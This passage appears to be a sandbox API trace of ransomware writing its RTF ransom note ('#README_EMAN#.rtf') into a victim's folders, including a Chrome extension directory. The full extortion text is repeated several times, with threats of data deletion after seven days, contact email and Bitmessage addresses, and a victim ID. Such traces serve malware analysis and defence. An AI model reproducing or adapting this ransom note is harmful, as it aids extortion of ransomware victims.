10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.509] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.512] CloseHandle (hObject=0x228) returned 1 [0284.513] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\#readme_eman#.rtf")) returned 0xffffffff [0284.513] GetLastError () returned 0x2 [0284.513] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 